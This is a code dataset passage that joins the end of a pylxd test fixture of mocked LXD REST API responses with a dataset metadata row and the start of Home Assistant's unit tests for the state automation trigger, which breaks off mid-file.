"roles": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members/an-member$",
},
# cluster-certificate
{
"text": json.dumps({"type": "sync", "status": "Success", "status_code": 200}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/cluster/certificate$",
},
# Instances
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd2.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances\?target=an-remote",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"status": "Running",
"status_code": 103,
"disk": {
"root": {
"usage": 10,
}
},
"memory": {
"usage": 15,
"usage_peak": 20,
"swap_usage": 0,
"swap_usage_peak": 5,
},
"network": {
"l0": {
"addresses": [
{
"family": "inet",
"address": "127.0.0.1",
"netmask": "8",
"scope": "local",
}
],
}
},
"pid": 69,
"processes": 100,
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-new-remote-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"location": "an-remote",
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-new-remote-instance$",
},
{
"status_code": 202,
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": instance_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": instance_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "async",
"metadata": {
"metadata": {
"fds": {
"0": "abc",
"1": "def",
"2": "ghi",
"control": "jkl",
}
},
},
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/exec$",
},
{
"json": instance_PUT,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
# Instance Snapshots
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"/1.0/instances/an_instance/snapshots/an-snapshot",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"name": "an_instance/an-snapshot",
"stateful": False,
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": snapshot_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
# Instance files
{
"text": "This is a getted file",
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fgetted$",
},
{
"text": '{"some": "value"}',
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fjson-get$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
{
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
# Images
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/images$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": "0" * 2048,
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/export$",
},
{
"text": image_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
# Image Aliases
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {"type": "sync", "status": "Success", "metadata": None},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/aliases$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/b-alias$",
},
# Images secret
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {"metadata": {"secret": "abcdefg"}},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/secret$",
},
# Networks
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/networks/lo",
"http://pylxd.test/1.0/networks/eth0",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"text": networks_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "lo",
"type": "loopback",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/lo$",
},
{
"text": networks_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/eth(0|1|2)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
{
"text": networks_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
# Storage Pools
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/storage-pools/lxd",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {
"type": "sync",
"metadata": {
"config": {"size": "0", "source": "/var/lib/lxd/disks/lxd.img"},
"description": "",
"name": "lxd",
"driver": "zfs",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
# Storage Resources
{
"json": {
"type": "sync",
"metadata": {
"space": {"used": 207111192576, "total": 306027577344},
"inodes": {"used": 3275333, "total": 18989056},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/resources$",
},
# Storage Volumes
{
"json": {
"type": "sync",
"metadata": [
"/1.0/storage-pools/default/volumes/instance/c1",
"/1.0/storage-pools/default/volumes/instance/c2",
"/1.0/storage-pools/default/volumes/container/c3",
"/1.0/storage-pools/default/volumes/container/c4",
"/1.0/storage-pools/default/volumes/virtual-machine/vm1",
"/1.0/storage-pools/default/volumes/virtual-machine/vm2",
"/1.0/storage-pools/default/volumes/image/i1",
"/1.0/storage-pools/default/volumes/image/i2",
"/1.0/storage-pools/default/volumes/custom/cu1",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes$",
},
# create a sync storage volume
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# create an async storage volume
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": (r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom$"),
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
# rename a storage volume, sync
{
"json": {
"type": "sync",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# rename a storage volume, async
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"status_code": 202,
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# Profiles
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/profiles/an-profile",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profiles_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profile_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile|an-renamed-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
# Projects
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/projects/test-project",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": projects_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects/(test-project|new-project)$",
},
{
"text": projects_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects/(new-project)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
# Operations
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc", "metadata": {"return": 0}},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"id": "images-create-operation",
"metadata": {
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation/wait$",
},
]
| 29.944062 | 121 | 0.410231 | 2,877 | 34,795 | 4.916927 | 0.095586 | 0.018521 | 0.043687 | 0.09105 | 0.866747 | 0.858759 | 0.839672 | 0.807154 | 0.78121 | 0.735119 | 0 | 0.071959 | 0.411697 | 34,795 | 1,161 | 122 | 29.969854 | 0.619101 | 0.010576 | 0 | 0.541102 | 0 | 0.019874 | 0.398994 | 0.063365 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01355 | false | 0 | 0.000903 | 0 | 0.028907 | 0.006323 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ae7c340ea8bdb8fd7bcc3ddef182d11254f843f | 39,128 | py | Python | tests/components/homeassistant/triggers/test_state.py | JonahKr/core | 8c96eb7c5602b5e0adf7688b8ac6ba127bc663d0 | [
"Apache-2.0"
] | null | null | null | tests/components/homeassistant/triggers/test_state.py | JonahKr/core | 8c96eb7c5602b5e0adf7688b8ac6ba127bc663d0 | [
"Apache-2.0"
] | null | null | null | tests/components/homeassistant/triggers/test_state.py | JonahKr/core | 8c96eb7c5602b5e0adf7688b8ac6ba127bc663d0 | [
"Apache-2.0"
] | null | null | null | """The test for state automation."""
from datetime import timedelta
import pytest
import homeassistant.components.automation as automation
from homeassistant.components.homeassistant.triggers import state as state_trigger
from homeassistant.core import Context
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.async_mock import patch
from tests.common import (
assert_setup_component,
async_fire_time_changed,
async_mock_service,
mock_component,
)
from tests.components.automation import common
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
hass.states.async_set("test.entity", "hello")
async def test_if_fires_on_entity_change(hass, calls):
"""Test for firing on entity change."""
context = Context()
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.entity"},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
assert calls[0].data["some"] == "state - test.entity - hello - world - None"
await common.async_turn_off(hass)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "planet")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_from_filter(hass, calls):
"""Test for firing on entity change with filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_to_filter(hass, calls):
"""Test for firing on entity change with no filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_attribute_change_with_to_filter(hass, calls):
"""Test for not firing on attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", {"test_attribute": 11})
hass.states.async_set("test.entity", "world", {"test_attribute": 12})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are a non match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_if_to_filter_not_match(hass, calls):
"""Test for not firing if to filter is not a match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "moon")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_from_filter_not_match(hass, calls):
"""Test for not firing if from filter is not a match."""
hass.states.async_set("test.entity", "bye")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_entity_not_match(hass, calls):
"""Test for not firing if entity is not matching."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.another_entity"},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_action(hass, calls):
"""Test for to action."""
entity_id = "domain.test_entity"
test_state = "new_state"
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": [
{"condition": "state", "entity_id": entity_id, "state": test_state}
],
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set(entity_id, test_state)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set(entity_id, test_state + "something")
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_if_to_boolean_value(hass, calls):
"""Test for setup failure for boolean to."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_if_from_boolean_value(hass, calls):
"""Test for setup failure for boolean from."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_bad_for(hass, calls):
"""Test for setup failure for bad for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"invalid": 5},
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_fails_setup_for_without_to(hass, calls):
"""Test for setup failures for missing to."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"for": {"seconds": 5},
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_not_fires_on_entity_change_with_for(hass, calls):
"""Test for not firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
hass.states.async_set("test.entity", "not_world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_on_entities_change_with_for_after_stop(hass, calls):
"""Test for not firing on entity change with for after stop trigger."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set("test.entity_1", "world_no")
hass.states.async_set("test.entity_2", "world_no")
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
await common.async_turn_off(hass)
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_attribute_change(hass, calls):
"""Test for firing on entity change with for and attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set(
"test.entity", "world", attributes={"mock_attr": "attr_change"}
)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_multiple_force_update(hass, calls):
"""Test for firing on entity change with for and force update."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.force_entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
for _ in range(4):
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert 1 == len(calls)
async def test_if_fires_on_entity_creation_and_removal(hass, calls):
"""Test for firing on entity creation and removal, with to/from constraints."""
# set automations for multiple combinations to/from
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "state", "entity_id": "test.entity_0"},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"from": "hello",
